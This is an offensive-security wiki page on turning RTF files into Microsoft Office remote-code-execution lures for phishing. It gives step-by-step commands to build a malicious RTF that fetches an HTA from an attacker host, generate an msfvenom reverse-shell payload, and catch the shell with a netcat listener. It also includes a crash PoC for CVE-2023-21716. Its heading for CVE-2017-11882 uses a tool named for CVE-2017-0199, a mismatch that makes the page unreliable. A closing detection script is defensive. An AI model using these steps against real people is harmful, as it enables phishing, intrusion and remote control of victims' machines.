MS Office - RTF Files RCE

Theory

RTF files are widely used in business communications for their rich formatting capabilities, making them a perfect disguise for malicious payloads. CVE-2023-21716 and CVE-2017-11882 are vulnerabilities within Microsoft Office that can be leveraged to execute arbitrary code when victims open a compromised RTF file.

This page covers how RTF files are weaponized for effective phishing campaigns.

Practice

CVE-2017-11882

We may use this Python exploit, which provides a quick and effective way to exploit the Microsoft RTF RCE vulnerability.

First, generate the malicious RTF file

python2.7 cve-2017-0199_toolkit.py -M gen -w bad.rtf -u http://<ATTACKING_IP>/bad.hta -t RTF -x 0

The exploit will call and execute an HTA file, which you may generate as follows

msfvenom -p windows/shell/reverse_tcp LHOST=<ATTACKING_IP> LPORT=<ATTACKING_PORT> -f hta-psh -o bad.hta

Host bad.hta on your webserver and start a listener

# Start the web server to host the bad.hta file
python3 -m http.server 80

# Start the listener
rlwrap nc -lvnp <ATTACKING_PORT>

Finally, send the bad.rtf file to the target. Once the victim opens the malicious RTF file, you will get a reverse shell.

CVE-2023-21716

The exploit isn't weaponized yet, but here is the Python PoC

# Build an RTF whose font table declares 32761 fonts; this oversized \fonttbl is what
# the CVE-2023-21716 PoC relies on to trigger the bug in Word's RTF parser.
fonttbl = "".join("{\\f%dA;}\n" % i for i in range(0, 32761))
with open("file.rtf", "wb") as f:
    f.write(("{\\rtf1{\n{\\fonttbl" + fonttbl + "}\n{\\rtlch no crash??}\n}}\n").encode("utf-8"))
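From the defender's side, both vectors on this page leave a recognizable trace in the RTF itself: an oversized \fonttbl group (the CVE-2023-21716 PoC) and the OLE-link control words the CVE-2017-0199 toolkit's output carries. The following triage script is an added example, not code from the original page or from either exploit; the MAX_FONTS threshold and the OLE_LINK_WORDS indicator list are assumptions of the example, and build_font_table_sample only constructs a test fixture shaped like the PoC above.

```python
import re
from typing import Dict, Union

# Assumed threshold (not from the page): ordinary documents declare a few dozen fonts,
# while the CVE-2023-21716 PoC declares 32761. Above this the font table is flagged.
MAX_FONTS = 1000

# One entry in the \fonttbl group looks like {\f0\fswiss\fcharset0 Arial;}
FONT_ENTRY = re.compile(rb"\{\\f(\d+)")
# Control words that accompany an auto-updating OLE link (the vector the CVE-2017-0199
# toolkit uses); this indicator list is an assumption of the example, not a full signature.
OLE_LINK_WORDS = (b"\\objautlink", b"\\objupdate", b"\\objdata")


def extract_group(data: bytes, control: bytes) -> bytes:
    """Return the first brace group opening with `control`, honouring nested groups."""
    start = data.find(b"{" + control)
    if start == -1:
        return b""
    depth = 0
    for i in range(start, len(data)):
        ch = data[i:i + 1]
        if ch == b"{":
            depth += 1
        elif ch == b"}":
            depth -= 1
            if depth == 0:
                return data[start:i + 1]
    return data[start:]  # unbalanced braces: malformed RTF, return the tail


def analyse_rtf(data: bytes) -> Dict[str, Union[int, bool]]:
    """Score an RTF blob on the two indicators discussed on this page."""
    font_count = len(FONT_ENTRY.findall(extract_group(data, b"\\fonttbl")))
    ole_link = any(word in data for word in OLE_LINK_WORDS)
    return {
        "is_rtf": data.startswith(b"{\\rtf"),
        "font_count": font_count,
        "oversized_fonttbl": font_count > MAX_FONTS,
        "ole_link_indicator": ole_link,
        "suspicious": font_count > MAX_FONTS or ole_link,
    }


def build_font_table_sample(n_fonts: int) -> bytes:
    """Constructed fixture shaped like the page's PoC: n_fonts entries and no other content."""
    table = "".join("{\\f%dA;}\n" % i for i in range(n_fonts))
    return ("{\\rtf1{\n{\\fonttbl" + table + "}\n{\\rtlch text}\n}}\n").encode("utf-8")
```

Run analyse_rtf over attachments pulled from a mail gateway or sandbox and alert on "suspicious"; the font count is cheap enough to compute on every RTF before it reaches a user.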
